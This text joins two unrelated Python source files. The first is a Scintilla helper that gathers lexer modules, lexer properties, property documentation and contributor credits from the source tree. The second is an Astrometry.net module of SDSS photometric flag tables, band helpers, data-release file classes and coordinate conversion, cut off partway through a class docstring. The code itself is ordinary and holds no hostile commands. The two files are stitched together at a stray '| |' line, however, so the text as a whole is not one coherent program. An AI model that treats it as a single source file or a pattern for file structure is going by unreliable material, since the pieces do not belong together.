# Information about lexers and properties defined in lexers
# lexFiles
# sorted list of lexer files
# lexerModules
# sorted list of module names
# lexerProperties
# sorted list of lexer properties
# propertyDocuments
# dictionary of property documentation { name: document string }
# sclexFromName
# dictionary of SCLEX_* IDs { name: SCLEX_ID }
# fileFromSclex
# dictionary of file names { SCLEX_ID: file name }
# This file can be run to see the data it provides.
# Requires Python 2.7 or later
from __future__ import with_statement
import codecs, datetime, glob, os, sys, textwrap
import FileGenerator
def FindModules(lexFile):
    """Return [moduleName, lexerID, languageName] for every LexerModule
    declaration in *lexFile*.

    A declaration may span several physical lines; fragments are
    accumulated until the line containing the closing parenthesis.
    """
    found = []
    pending = ""
    with open(lexFile) as src:
        for raw in src.readlines():
            line = raw.rstrip()
            # Skip anything that is neither the start of a declaration
            # nor the continuation of one already in progress.
            if not (pending or line.startswith("LexerModule")):
                continue
            if ")" not in line:
                pending = pending + line
                continue
            # Complete declaration: turn punctuation into spaces so a
            # plain split() yields the individual arguments.
            whole = pending + line
            for ch in "(),":
                whole = whole.replace(ch, " ")
            fields = whole.split()
            # fields[4] is the quoted language name; drop its quotes.
            found.append([fields[1], fields[2], fields[4][1:-1]])
            pending = ""
    return found
def FindLexersInXcode(xCodeProject):
    """Return {lexerName: [buildUID, fileRefUID]} for the lexer files
    referenced by the Xcode project file *xCodeProject*.

    NOTE(review): assumes FileGenerator.FindSectionInList returns an
    index/slice usable to extract the named section -- confirm against
    FileGenerator.
    """
    lines = FileGenerator.ReadFileAsList(xCodeProject)

    # First pass: collect the two UIDs Xcode assigns to every built file.
    uidsOfBuild = {}
    markersPBXBuildFile = ["Begin PBXBuildFile section", "", "End PBXBuildFile section"]
    for buildLine in lines[FileGenerator.FindSectionInList(lines, markersPBXBuildFile)]:
        # Occurs for each file in the build. Find the UIDs used for the file.
        #\t\t[0-9A-F]+ /* [a-zA-Z]+.cxx in sources */ = {isa = PBXBuildFile; fileRef = [0-9A-F]+ /* [a-zA-Z]+ */; };
        pieces = buildLine.split()
        uid1 = pieces[0]
        filename = pieces[2].split(".")[0]
        uid2 = pieces[12]
        uidsOfBuild[filename] = [uid1, uid2]

    # Second pass: restrict to the children of the "Lexers" group.
    lexers = {}
    markersLexers = ["/* Lexers */ =", "children", ");"]
    for lexerLine in lines[FileGenerator.FindSectionInList(lines, markersLexers)]:
        #\t\t\t\t[0-9A-F]+ /* [a-zA-Z]+.cxx */,
        uid, _, rest = lexerLine.partition("/* ")
        uid = uid.strip()
        lexer, _, _ = rest.partition(".")
        lexers[lexer] = uidsOfBuild[lexer]
    return lexers
# Properties that start with lexer. or fold. are automatically found but there are some
# older properties that don't follow this pattern so must be explicitly listed.
# FindProperties() consults this list; keep it in sync with the lexers.
knownIrregularProperties = [
    "fold",
    "styling.within.preprocessor",
    "tab.timmy.whinge.level",
    "asp.default.language",
    "html.tags.case.sensitive",
    "ps.level",
    "ps.tokenize",
    "sql.backslash.escapes",
    "nsis.uservars",
    "nsis.ignorecase"
]
def FindProperties(lexFile):
    """Return a dict whose keys are the property names referenced in
    *lexFile* (values are the placeholder 1; the dict is used as a set).

    A name qualifies if it is lower case and either starts with "fold."
    or "lexer." or appears in knownIrregularProperties.
    """
    properties = {}
    with open(lexFile) as src:
        for raw in src.readlines():
            usesProperty = "GetProperty" in raw or "DefineProperty" in raw
            if not (usesProperty and "\"" in raw):
                continue
            line = raw.strip()
            if line.startswith("//"):
                continue  # drop commented-out references
            name = line.split("\"")[1]
            if name.lower() != name:
                continue  # only lower case property names are allowed
            # Short-circuit on the common prefixes before consulting the
            # irregular-name list.
            if (name.startswith("fold.") or name.startswith("lexer.")
                    or name in knownIrregularProperties):
                properties[name] = 1
    return properties
def FindPropertyDocumentation(lexFile):
    """Return {propertyName: documentation string} for the properties
    documented in *lexFile*.

    Two documentation styles are recognised:
    * a ``// property <name>`` comment followed by further ``//`` lines;
    * a ``DefineProperty("name", ...)`` call followed by quoted
      description string fragments.
    Properties that end up with empty documentation are dropped.
    """
    documents = {}
    with open(lexFile) as f:
        # Name of the property whose text is being accumulated; "" = none.
        name = ""
        for l in f.readlines():
            l = l.strip()
            if "// property " in l:
                propertyName = l.split()[2]
                if propertyName.lower() == propertyName:
                    # Only allow lower case property names
                    name = propertyName
                    documents[name] = ""
            elif "DefineProperty" in l and "\"" in l:
                propertyName = l.split("\"")[1]
                if propertyName.lower() == propertyName:
                    # Only allow lower case property names
                    name = propertyName
                    documents[name] = ""
            elif name:
                if l.startswith("//"):
                    # Comment continuation: join fragments with a space.
                    if documents[name]:
                        documents[name] += " "
                    documents[name] += l[2:].strip()
                elif l.startswith("\""):
                    # String-literal continuation of a DefineProperty call:
                    # strip surrounding quotes and any trailing ");".
                    l = l[1:].strip()
                    if l.endswith(";"):
                        l = l[:-1].strip()
                    if l.endswith(")"):
                        l = l[:-1].strip()
                    if l.endswith("\""):
                        l = l[:-1]
                    # Fix escaped double quotes
                    l = l.replace("\\\"", "\"")
                    documents[name] += l
                else:
                    # Any other line terminates the current property.
                    name = ""
    for name in list(documents.keys()):
        if documents[name] == "":
            del documents[name]
    return documents
def FindCredits(historyFile):
    """Extract contributor credits from ScintillaHistory.html.

    Only <td> cells between the first <table> and its matching </table>
    are considered.  A cell of the form
    ``title <a href="url">name</a>`` is flattened to "title name url".
    """
    names = []
    inTable = False
    finished = False
    with codecs.open(historyFile, "r", "utf-8") as src:
        for rawLine in src.readlines():
            line = rawLine.strip()
            if not inTable and not finished and line == "<table>":
                inTable = True
            elif inTable and line == "</table>":
                # Only the first table holds credits; ignore the rest.
                inTable = False
                finished = True
            if inTable and line.startswith("<td>"):
                # Strip the surrounding <td>...</td> tags.
                entry = line[4:-5]
                if "<a" in line:
                    title, _, remainder = entry.partition("<a href=")
                    quotedUrl, _, tail = remainder.partition(">")
                    person = tail.split("<")[0]
                    entry = title.strip()
                    if entry:
                        entry += " "
                    # quotedUrl[1:-1] removes the quotes around the URL.
                    entry += person + " " + quotedUrl[1:-1]
                names.append(entry)
    return names
def ciCompare(a, b):
    """Case-insensitive three-way comparison for use as a sort
    comparison function: returns -1, 0 or 1.

    Implemented with the ``(x > y) - (x < y)`` idiom instead of the
    builtin ``cmp`` so it also works on Python 3, where ``cmp`` was
    removed (calling the old version there raised NameError).
    """
    al = a.lower()
    bl = b.lower()
    return (al > bl) - (al < bl)
def ciKey(a):
    """Sort key that ignores character case."""
    return a.lower()
def SortListInsensitive(l):
    """Sort the list *l* in place, ignoring character case."""
    try:
        # Pythons with key= support: cheapest, one lower() per element.
        l.sort(key=lambda item: item.lower())
    except TypeError:
        # Very old Pythons without key= fall back to a comparison function.
        l.sort(ciCompare)
class ScintillaData:
    """Gather version, modification-date, lexer and credits information
    from a Scintilla source tree rooted at *scintillaRoot*; see the
    module docstring for the attributes exposed.
    """

    def __init__(self, scintillaRoot):
        # Discover version information
        with open(scintillaRoot + "version.txt") as f:
            self.version = f.read().strip()
        self.versionDotted = self.version[0] + '.' + self.version[1] + '.' + \
            self.version[2]
        self.versionCommad = self.versionDotted.replace(".", ", ") + ', 0'

        # Date.Modified is stored in a meta tag inside doc/index.html.
        with open(scintillaRoot + "doc/index.html") as f:
            self.dateModified = [l for l in f.readlines() if "Date.Modified" in l]\
                [0].split('\"')[3]
            # 20130602
            # index.html, SciTE.html
        dtModified = datetime.datetime.strptime(self.dateModified, "%Y%m%d")
        self.yearModified = self.dateModified[0:4]
        monthModified = dtModified.strftime("%B")
        dayModified = "%d" % dtModified.day
        self.mdyModified = monthModified + " " + dayModified + " " + self.yearModified
        # May 22 2013
        # index.html, SciTE.html
        self.dmyModified = dayModified + " " + monthModified + " " + self.yearModified
        # 22 May 2013
        # ScintillaHistory.html -- only first should change
        self.myModified = monthModified + " " + self.yearModified

        # Find all the lexer source code files
        lexFilePaths = glob.glob(scintillaRoot + "lexers/Lex*.cxx")
        SortListInsensitive(lexFilePaths)
        self.lexFiles = [os.path.basename(f)[:-4] for f in lexFilePaths]
        self.lexerModules = []
        lexerProperties = set()
        self.propertyDocuments = {}
        self.sclexFromName = {}
        self.fileFromSclex = {}
        for lexFile in lexFilePaths:
            # Each file can declare several LexerModules.
            modules = FindModules(lexFile)
            for module in modules:
                self.sclexFromName[module[2]] = module[1]
                self.fileFromSclex[module[1]] = lexFile
                self.lexerModules.append(module[0])
            for k in FindProperties(lexFile).keys():
                lexerProperties.add(k)
            documents = FindPropertyDocumentation(lexFile)
            for k in documents.keys():
                # First definition of a property's documentation wins.
                if k not in self.propertyDocuments:
                    self.propertyDocuments[k] = documents[k]
        SortListInsensitive(self.lexerModules)
        self.lexerProperties = list(lexerProperties)
        SortListInsensitive(self.lexerProperties)

        self.lexersXcode = FindLexersInXcode(scintillaRoot + "cocoa/ScintillaFramework/ScintillaFramework.xcodeproj/project.pbxproj")
        self.credits = FindCredits(scintillaRoot + "doc/ScintillaHistory.html")
def printWrapped(text):
    """Print *text* filled to the default width, indenting continuation lines."""
    wrapped = textwrap.fill(text, subsequent_indent=" ")
    print(wrapped)
# Self-test / demo: when run as a script, scrape the Scintilla tree rooted one
# directory up and print a summary of everything that was discovered.
if __name__=="__main__":
    sci = ScintillaData("../")
    # Version and modification-date stamps read from version.txt / doc/index.html.
    print("Version %s %s %s" % (sci.version, sci.versionDotted, sci.versionCommad))
    print("Date last modified %s %s %s %s %s" % (
        sci.dateModified, sci.yearModified, sci.mdyModified, sci.dmyModified, sci.myModified))
    printWrapped(str(len(sci.lexFiles)) + " lexer files: " + ", ".join(sci.lexFiles))
    printWrapped(str(len(sci.lexerModules)) + " lexer modules: " + ", ".join(sci.lexerModules))
    # Xcode cross-reference report kept disabled (commented with #~).
    #~ printWrapped(str(len(sci.lexersXcode)) + " Xcode lexer references: " + ", ".join(
    #~ [lex+":"+uids[0]+","+uids[1] for lex, uids in sci.lexersXcode.items()]))
    print("Lexer name to ID:")
    lexNames = sorted(sci.sclexFromName.keys())
    for lexName in lexNames:
        sclex = sci.sclexFromName[lexName]
        fileName = os.path.basename(sci.fileFromSclex[sclex])
        print(" " + lexName + " -> " + sclex + " in " + fileName)
    printWrapped("Lexer properties: " + ", ".join(sci.lexerProperties))
    print("Lexer property documentation:")
    documentProperties = list(sci.propertyDocuments.keys())
    SortListInsensitive(documentProperties)
    for k in documentProperties:
        print(" " + k)
        print(textwrap.fill(sci.propertyDocuments[k], initial_indent=" ",
            subsequent_indent=" "))
    print("Credits:")
    for c in sci.credits:
        # Python 2: print an encoded byte string directly.
        if sys.version_info[0] == 2:
            print(" " + c.encode("utf-8"))
        else:
            # Python 3: write raw UTF-8 bytes to sidestep console-encoding errors.
            sys.stdout.buffer.write(b" " + c.encode("utf-8") + b"\n")
| |
# This file is part of the Astrometry.net suite.
# Licensed under a 3-clause BSD style license - see LICENSE
from __future__ import print_function
import os
from astrometry.util.fits import fits_table
from astrometry.util.miscutils import get_overlapping_region
import numpy as np
from functools import reduce
# Optional compiled helpers for the hot single-point coordinate transforms;
# fall back to the pure-Python implementations when the extension is missing.
# Catch only ImportError: a bare except would also hide real errors raised
# while importing cutils (and swallow KeyboardInterrupt/SystemExit).
try:
    import cutils
except ImportError:
    cutils = None
# SDSS CAS photometric-object "flags" bitmask: the flags occupy consecutive
# bits, in order, from bit 0 (CANONICAL_CENTER) through bit 63 (RESERVED),
# so the name->mask table can be generated by enumeration.
cas_flags = dict((name, 1 << bit) for bit, name in enumerate([
    'CANONICAL_CENTER', 'BRIGHT', 'EDGE', 'BLENDED',
    'CHILD', 'PEAKCENTER', 'NODEBLEND', 'NOPROFILE',
    'NOPETRO', 'MANYPETRO', 'NOPETRO_BIG', 'DEBLEND_TOO_MANY_PEAKS',
    'COSMIC_RAY', 'MANYR50', 'MANYR90', 'BAD_RADIAL',
    'INCOMPLETE_PROFILE', 'INTERP', 'SATURATED', 'NOTCHECKED',
    'SUBTRACTED', 'NOSTOKES', 'BADSKY', 'PETROFAINT',
    'TOO_LARGE', 'DEBLENDED_AS_PSF', 'DEBLEND_PRUNED', 'ELLIPFAINT',
    'BINNED1', 'BINNED2', 'BINNED4', 'MOVED',
    'DEBLENDED_AS_MOVING', 'NODEBLEND_MOVING', 'TOO_FEW_DETECTIONS', 'BAD_MOVING_FIT',
    'STATIONARY', 'PEAKS_TOO_CLOSE', 'MEDIAN_CENTER', 'LOCAL_EDGE',
    'BAD_COUNTS_ERROR', 'BAD_MOVING_FIT_CHILD', 'DEBLEND_UNASSIGNED_FLUX', 'SATUR_CENTER',
    'INTERP_CENTER', 'DEBLENDED_AT_EDGE', 'DEBLEND_NOPEAK', 'PSF_FLUX_INTERP',
    'TOO_FEW_GOOD_DETECTIONS', 'CENTER_OFF_AIMAGE', 'DEBLEND_DEGENERATE', 'BRIGHTEST_GALAXY_CHILD',
    'CANONICAL_BAND', 'AMOMENT_FAINT', 'AMOMENT_SHIFT', 'AMOMENT_MAXITER',
    'MAYBE_CR', 'MAYBE_EGHOST', 'NOTCHECKED_CENTER', 'OBJECT2_HAS_SATUR_DN',
    'OBJECT2_DEBLEND_PEEPHOLE', 'GROWN_MERGED', 'HAS_CENTER', 'RESERVED',
]))
# From:
# http://www.sdss3.org/svn/repo/idlutils/trunk/data/sdss/sdssMaskbits.par
# via
# s = open('sdssMaskbits.par').read()
# bits = []
# for line in s.split('\n'):
# sp = line.split()
# line = (int(sp[2]), sp[3], ' '.join(sp[4:]))
# bits.append(line)
# print repr(bits).replace('), ', '),\n ')
#
# (bit, NAME, description) triples for the first 32 OBJECT1 photo flags,
# transcribed from sdssMaskbits.par (see the comment block above).
photo_flags1_info = [
    # masktype OBJECT1 32 "Object flags from photo reductions for SDSS (first 32)"
    (0, 'CANONICAL_CENTER', '"The quantities (psf counts, model fits and likelihoods) that are usually determined at an object\'s center as determined band-by-band were in fact determined at the canonical center (suitably transformed). This is due to the object being to close to the edge to extract a profile at the local center, and OBJECT1_EDGE is also set."'),
    (1, 'BRIGHT', '"Indicates that the object was detected as a bright object. Since these are typically remeasured as faint objects, most users can ignore BRIGHT objects."'),
    (2, 'EDGE', '"Object is too close to edge of frame in this band."'),
    (3, 'BLENDED', '"Object was determined to be a blend. The flag is set if: more than one peak is detected within an object in a single band together; distinct peaks are found when merging different colours of one object together; or distinct peaks result when merging different objects together. "'),
    (4, 'CHILD', '"Object is a child, created by the deblender."'),
    (5, 'PEAKCENTER', '"Given center is position of peak pixel, as attempts to determine a better centroid failed."'),
    (6, 'NODEBLEND', '"Although this object was marked as a blend, no deblending was attempted."'),
    (7, 'NOPROFILE', '"Frames couldn\'t extract a radial profile."'),
    (8, 'NOPETRO', '" No Petrosian radius or other Petrosian quanties could be measured."'),
    (9, 'MANYPETRO', '"Object has more than one possible Petrosian radius."'),
    (10, 'NOPETRO_BIG', '"The Petrosian ratio has not fallen to the value at which the Petrosian radius is defined at the outermost point of the extracted radial profile. NOPETRO is set, and the Petrosian radius is set to the outermost point in the profile."'),
    (11, 'DEBLEND_TOO_MANY_PEAKS', '"The object had the OBJECT1_DEBLEND flag set, but it contained too many candidate children to be fully deblended. This flag is only set in the parent, i.e. the object with too many peaks."'),
    (12, 'CR', '"Object contains at least one pixel which was contaminated by a cosmic ray. The OBJECT1_INTERP flag is also set. This flag does not mean that this object is a cosmic ray; rather it means that a cosmic ray has been removed. "'),
    (13, 'MANYR50', '" More than one radius was found to contain 50% of the Petrosian flux. (For this to happen part of the radial profile must be negative)."'),
    (14, 'MANYR90', '"More than one radius was found to contain 90% of the Petrosian flux. (For this to happen part of the radial profile must be negative)."'),
    (15, 'BAD_RADIAL', '" Measured profile includes points with a S/N <= 0. In practice this flag is essentially meaningless."'),
    (16, 'INCOMPLETE_PROFILE', '"A circle, centerd on the object, of radius the canonical Petrosian radius extends beyond the edge of the frame. The radial profile is still measured from those parts of the object that do lie on the frame."'),
    (17, 'INTERP', '" The object contains interpolated pixels (e.g. cosmic rays or bad columns)."'),
    (18, 'SATUR', '"The object contains saturated pixels; INTERP is also set."'),
    (19, 'NOTCHECKED', '"Object includes pixels that were not checked for peaks, for example the unsmoothed edges of frames, and the cores of subtracted or saturated stars."'),
    (20, 'SUBTRACTED', '"Object (presumably a star) had wings subtracted."'),
    (21, 'NOSTOKES', '"Object has no measured Stokes parameters."'),
    (22, 'BADSKY', '"The estimated sky level is so bad that the central value of the radial profile is crazily negative; this is usually the result of the subtraction of the wings of bright stars failing."'),
    (23, 'PETROFAINT', '"At least one candidate Petrosian radius occured at an unacceptably low surface brightness."'),
    (24, 'TOO_LARGE', '" The object is (as it says) too large. Either the object is still detectable at the outermost point of the extracted radial profile (a radius of approximately 260 arcsec), or when attempting to deblend an object, at least one child is larger than half a frame (in either row or column)."'),
    (25, 'DEBLENDED_AS_PSF', '"When deblending an object, in this band this child was treated as a PSF."'),
    (26, 'DEBLEND_PRUNED', '"When solving for the weights to be assigned to each child the deblender encountered a nearly singular matrix, and therefore deleted at least one of them."'),
    (27, 'ELLIPFAINT', '"No isophotal fits were performed."'),
    (28, 'BINNED1', '"The object was detected in an unbinned image."'),
    (29, 'BINNED2', '" The object was detected in a 2x2 binned image after all unbinned detections have been replaced by the background level."'),
    (30, 'BINNED4', '"The object was detected in a 4x4 binned image. The objects detected in the 2x2 binned image are not removed before doing this."'),
    (31, 'MOVED', '"The object appears to have moved during the exposure. Such objects are candidates to be deblended as moving objects."'),
    ]
# (bit, NAME, description) triples for the second 32 OBJECT2 photo flags,
# transcribed from sdssMaskbits.par (see the comment block above).
photo_flags2_info = [
    (0, 'DEBLENDED_AS_MOVING', '"The object has the MOVED flag set, and was deblended on the assumption that it was moving."'),
    (1, 'NODEBLEND_MOVING', '"The object has the MOVED flag set, but was not deblended as a moving object."'),
    (2, 'TOO_FEW_DETECTIONS', '"The object has the MOVED flag set, but has too few detection to be deblended as moving."'),
    (3, 'BAD_MOVING_FIT', '"The fit to the object as a moving object is too bad to be believed."'),
    (4, 'STATIONARY', '"A moving objects velocity is consistent with zero"'),
    (5, 'PEAKS_TOO_CLOSE', '"Peaks in object were too close (set only in parent objects)."'),
    (6, 'BINNED_CENTER', '"When centroiding the object the object\'s size is larger than the (PSF) filter used to smooth the image."'),
    (7, 'LOCAL_EDGE', '"The object\'s center in some band was too close to the edge of the frame to extract a profile."'),
    (8, 'BAD_COUNTS_ERROR', '"An object containing interpolated pixels had too few good pixels to form a reliable estimate of its error"'),
    (9, 'BAD_MOVING_FIT_CHILD', '"A putative moving child\'s velocity fit was too poor, so it was discarded, and the parent was not deblended as moving"'),
    (10, 'DEBLEND_UNASSIGNED_FLUX', '"After deblending, the fraction of flux assigned to none of the children was too large (this flux is then shared out as described elsewhere)."'),
    (11, 'SATUR_CENTER', '"An object\'s center is very close to at least one saturated pixel; the object may well be causing the saturation."'),
    (12, 'INTERP_CENTER', '"An object\'s center is very close to at least one interpolated pixel."'),
    (13, 'DEBLENDED_AT_EDGE', '"An object so close to the edge of the frame that it would not ordinarily be deblended has been deblended anyway. Only set for objects large enough to be EDGE in all fields/strips."'),
    (14, 'DEBLEND_NOPEAK', '"A child had no detected peak in a given band, but we centroided it anyway and set the BINNED1"'),
    (15, 'PSF_FLUX_INTERP', '"The fraction of light actually detected (as opposed to guessed at by the interpolator) was less than some number (currently 80%) of the total."'),
    (16, 'TOO_FEW_GOOD_DETECTIONS', '"A child of this object had too few good detections to be deblended as moving."'),
    (17, 'CENTER_OFF_AIMAGE', '"At least one peak\'s center lay off the atlas image in some band. This can happen when the object\'s being deblended as moving, or if the astrometry is badly confused."'),
    (18, 'DEBLEND_DEGENERATE', '"At least one potential child has been pruned because its template was too similar to some other child\'s template."'),
    (19, 'BRIGHTEST_GALAXY_CHILD', '"This is the brightest child galaxy in a blend."'),
    (20, 'CANONICAL_BAND', '"This band was the canonical band. This is the band used to measure the Petrosian radius used to calculate the Petrosian counts in each band, and to define the model used to calculate model colors; it has no effect upon the coordinate system used for the OBJC center."'),
    (21, 'AMOMENT_UNWEIGHTED', '"`Adaptive\' moments are actually unweighted."'),
    (22, 'AMOMENT_SHIFT', '"Object\'s center moved too far while determining adaptive moments. In this case, the M_e1 and M_e2 give the (row, column) shift, not the object\'s shape."'),
    (23, 'AMOMENT_MAXITER', '"Too many iterations while determining adaptive moments."'),
    (24, 'MAYBE_CR', '"This object may be a cosmic ray. This bit can get set in the cores of bright stars, and is quite likely to be set for the cores of saturated stars."'),
    (25, 'MAYBE_EGHOST', '"Object appears in the right place to be an electronics ghost."'),
    (26, 'NOTCHECKED_CENTER', '"Center of object lies in a NOTCHECKED region. The object is almost certainly bogus."'),
    (27, 'HAS_SATUR_DN', '"This object is saturated in this band and the bleed trail doesn\'t touch the edge of the frame, we we\'ve made an attempt to add up all the flux in the bleed trails, and to include it in the object\'s photometry. "'),
    (28, 'DEBLEND_PEEPHOLE', '"The deblend was modified by the optimizer"'),
    (29, 'SPARE3', '""'),
    (30, 'SPARE2', '""'),
    (31, 'SPARE1', '""'),
    ]
# (bit, NAME, description) triples for the BOSS_TARGET1 target-selection
# bitmask; note the bit numbers are NOT consecutive (deprecated bits are
# listed only as comments below).
specobj_boss_target1_info = [
    # masktype BOSS_TARGET1 64 "BOSS survey primary target selection flags"
    # galaxies
    (0, 'GAL_LOZ', "low-z lrgs"),
    (1, 'GAL_CMASS', "dperp > 0.55, color-mag cut"),
    (2, 'GAL_CMASS_COMM', "dperp > 0.55, commissioning color-mag cut"),
    (3, 'GAL_CMASS_SPARSE', "GAL_CMASS_COMM & (!GAL_CMASS) & (i < 19.9) sparsely sampled"),
    (6, 'SDSS_KNOWN', "Matches a known SDSS spectra"),
    (7, 'GAL_CMASS_ALL', "GAL_CMASS and the entire sparsely sampled region"),
    (8, 'GAL_IFIBER2_FAINT', "ifiber2 > 21.5, extinction corrected. Used after Nov 2010"),
    # galaxies deprecated
    #maskbits BOSS_TARGET1 3 GAL_GRRED "red in g-r"
    #maskbits BOSS_TARGET1 4 GAL_TRIANGLE "GAL_HIZ and !GAL_CMASS"
    #maskbits BOSS_TARGET1 5 GAL_LODPERP "Same as hiz but between dperp00 and dperp0"
    # qsos (1)
    (10, 'QSO_CORE', "restrictive qso selection: commissioning only"),
    (11, 'QSO_BONUS', "permissive qso selection: commissioning only"),
    (12, 'QSO_KNOWN_MIDZ', "known qso between [2.2,9.99]"),
    (13, 'QSO_KNOWN_LOHIZ', "known qso outside of miz range. never target"),
    (14, 'QSO_NN', "Neural Net that match to sweeps/pass cuts"),
    (15, 'QSO_UKIDSS', "UKIDSS stars that match sweeps/pass flag cuts"),
    (16, 'QSO_KDE_COADD', "kde targets from the stripe82 coadd"),
    (17, 'QSO_LIKE', "likelihood method"),
    (18, 'QSO_FIRST_BOSS', "FIRST radio match"),
    (19, 'QSO_KDE', "selected by kde+chi2"),
    # standards
    (20, 'STD_FSTAR', "standard f-stars"),
    (21, 'STD_WD', "white dwarfs"),
    (22, 'STD_QSO', "qso"),
    # template stars
    (32, 'TEMPLATE_GAL_PHOTO', "galaxy templates"),
    (33, 'TEMPLATE_QSO_SDSS1', "QSO templates"),
    (34, 'TEMPLATE_STAR_PHOTO', "stellar templates"),
    (35, 'TEMPLATE_STAR_SPECTRO', "stellar templates (spectroscopically known)"),
    # qsos (2)
    (40, 'QSO_CORE_MAIN', "Main survey core sample"),
    (41, 'QSO_BONUS_MAIN', "Main survey bonus sample"),
    (42, 'QSO_CORE_ED', "Extreme Deconvolution in Core"),
    (43, 'QSO_CORE_LIKE', "Likelihood that make it into core"),
    (44, 'QSO_KNOWN_SUPPZ', "known qso between [1.8,2.15]"),
    ]
# Convenience name -> bitmask dictionaries derived from the tables above.
specobj_boss_target1_map = {name: 1 << bit
                            for bit, name, _desc in specobj_boss_target1_info}
photo_flags1_map = {name: 1 << bit
                    for bit, name, _desc in photo_flags1_info}
photo_flags2_map = {name: 1 << bit
                    for bit, name, _desc in photo_flags2_info}
def band_names():
    """Return the five SDSS band names, bluest to reddest."""
    return list('ugriz')
def band_name(b):
    """Return the band letter for b, which may be a letter ('u'..'z') or an
    integer index 0..4; raises for anything else."""
    if b in ('u', 'g', 'r', 'i', 'z'):
        return b
    if b in (0, 1, 2, 3, 4):
        return 'ugriz'[b]
    raise Exception('Invalid SDSS band: "' + str(b) + '"')
def band_index(b):
    """Return the integer band index 0..4 for b, which may be a letter
    ('u'..'z') or already an integer index; raises for anything else."""
    if b in ('u', 'g', 'r', 'i', 'z'):
        return 'ugriz'.index(b)
    if b in (0, 1, 2, 3, 4):
        return b
    raise Exception('Invalid SDSS band: "' + str(b) + '"')
class SdssDR(object):
    """Base class for an SDSS Data Release: maps a file type plus
    (run, camcol, field, band) identifiers to a filename, and opens FITS
    files beneath an optional base directory."""

    def __init__(self, curl=False, basedir=None):
        self.curl = curl
        self.basedir = basedir
        # filetype -> %-style pattern keyed by run/camcol/field/band/rerun;
        # populated by subclasses.
        self.filenames = {}

    def getDRNumber(self):
        """Data-release number; subclasses override (base returns -1)."""
        return -1

    def getFilename(self, filetype, *args, **kwargs):
        """Return the filename for 'filetype', or None if the type is unknown.

        Positional args are interpreted, in order, as run, camcol, field,
        band; a numeric band is converted to its letter name.
        """
        for key, value in zip(['run', 'camcol', 'field', 'band'], args):
            kwargs[key] = value
        # convert band number to band character.
        if kwargs.get('band') is not None:
            kwargs['band'] = band_name(kwargs['band'])
        if filetype not in self.filenames:
            return None
        pattern = self.filenames[filetype]
        # Fill in the default rerun when the caller did not supply one.
        if kwargs.get('rerun', None) is None:
            kwargs['rerun'] = self.get_rerun(kwargs.get('run', None))
        return pattern % kwargs

    def get_rerun(self, run, field=None):
        """Default rerun for a run; subclasses override (base returns None)."""
        return None

    def getPath(self, *args, **kwargs):
        """Like getFilename, but prefixed with the base directory if set."""
        fn = self.getFilename(*args, **kwargs)
        if fn is not None and self.basedir is not None:
            fn = os.path.join(self.basedir, fn)
        return fn

    def setBasedir(self, dirnm):
        self.basedir = dirnm

    def _open(self, fn):
        """Open a FITS file: prefer fitsio, falling back to pyfits/astropy."""
        path = fn if self.basedir is None else os.path.join(self.basedir, fn)
        try:
            import fitsio
            return fitsio_wrapper(fitsio.FITS(path))
        except ImportError:
            pass
        try:
            import pyfits
        except ImportError:
            try:
                from astropy.io import fits as pyfits
            except ImportError:
                raise ImportError("Cannot import either pyfits or astropy.io.fits")
        return pyfits.open(path)
class fitsio_wrapper(object):
    """Thin adapter making a fitsio.FITS object usable by pyfits-style
    callers: each HDU gets a .data attribute aliased back to the HDU
    itself."""
    def __init__(self, F):
        self.F = F

    def __getitem__(self, index):
        item = self.F[index]
        # pyfits code reads hdu.data; point it back at the HDU object.
        item.data = item
        return item
class SdssFile(object):
    """Base class for one SDSS data product file (fpC, fpM, psField, ...):
    records the (run, camcol, field) identifiers and, optionally, the band
    as both its letter name and integer index."""
    def __init__(self, run=None, camcol=None, field=None, band=None, rerun=None,
                 **kwargs):
        '''
        band: string ('u', 'g', 'r', 'i', 'z')
        '''
        self.run = run
        self.camcol = camcol
        self.field = field
        # Band attributes are only created when a band was given; other code
        # probes for them with hasattr/getattr.
        if band is not None:
            self.band = band_name(band)
            self.bandi = band_index(band)
        if rerun is not None:
            self.rerun = rerun
        self.filetype = 'unknown'

    def getRun(self):
        return getattr(self, 'run', 0)

    def getCamcol(self):
        return getattr(self, 'camcol', 0)

    def getField(self):
        return getattr(self, 'field', 0)

    def __str__(self):
        name = 'SDSS %s %i-%i-%i' % (self.filetype, self.getRun(),
                                     self.getCamcol(), self.getField())
        if hasattr(self, 'band'):
            name += '-%s' % self.band
        return name
def munu_to_radec_rad(mu, nu, node, incl):
    '''
    Convert SDSS great-circle survey coordinates (mu, nu) to (RA, Dec).
    All four inputs must be in RADIANS; see munu_to_radec_deg for DEGREES.
    '''
    sin_dmu = np.sin(mu - node)
    cos_dmu = np.cos(mu - node)
    sin_nu, cos_nu = np.sin(nu), np.cos(nu)
    sin_incl, cos_incl = np.sin(incl), np.cos(incl)
    # Rotation by the inclination about the ascending node back to equatorial.
    y = sin_dmu * cos_nu * cos_incl - sin_nu * sin_incl
    x = cos_dmu * cos_nu
    ra = node + np.arctan2(y, x)
    dec = np.arcsin(sin_dmu * cos_nu * sin_incl + sin_nu * cos_incl)
    return ra, dec
def munu_to_radec_deg(mu, nu, node, incl):
    '''
    Convert SDSS great-circle survey coordinates (mu, nu) to (RA, Dec).
    All four inputs are in DEGREES; see munu_to_radec_rad for RADIANS.
    The returned RA is wrapped into [0, 360].
    '''
    ra, dec = munu_to_radec_rad(np.deg2rad(mu), np.deg2rad(nu),
                                np.deg2rad(node), np.deg2rad(incl))
    ra, dec = np.rad2deg(ra), np.rad2deg(dec)
    # Wrap RA into range.
    ra = ra + (360. * (ra < 0))
    ra = ra - (360. * (ra > 360))
    return (ra, dec)
# makes an SDSS AsTrans WCS object look like an anwcs / Tan / Sip
class AsTransWrapper(object):
    """Adapter giving an SDSS AsTrans object the anwcs/Tan/Sip WCS interface.

    wcs    -- AsTrans-like object with pixel_to_radec / radec_to_pixel
    w, h   -- image size, exposed as .imagew / .imageh
    x0, y0 -- pixel offset of this sub-image within the full frame
    """
    def __init__(self, wcs, w, h, x0=0, y0=0):
        self.wcs = wcs
        self.imagew = w
        self.imageh = h
        self.x0 = x0
        self.y0 = y0

    def pixelxy2radec(self, x, y):
        # Shift 1-indexed sub-image pixels to 0-indexed full-frame pixels.
        ra, dec = self.wcs.pixel_to_radec(x + self.x0 - 1, y + self.y0 - 1)
        return ra, dec

    def radec2pixelxy(self, ra, dec):
        px, py = self.wcs.radec_to_pixel(ra, dec)
        # The leading True mimics the anwcs "ok" return flag.
        return True, px - self.x0 + 1, py - self.y0 + 1
class AsTrans(SdssFile):
    '''
    In DR7, asTrans structures can appear in asTrans files (for a
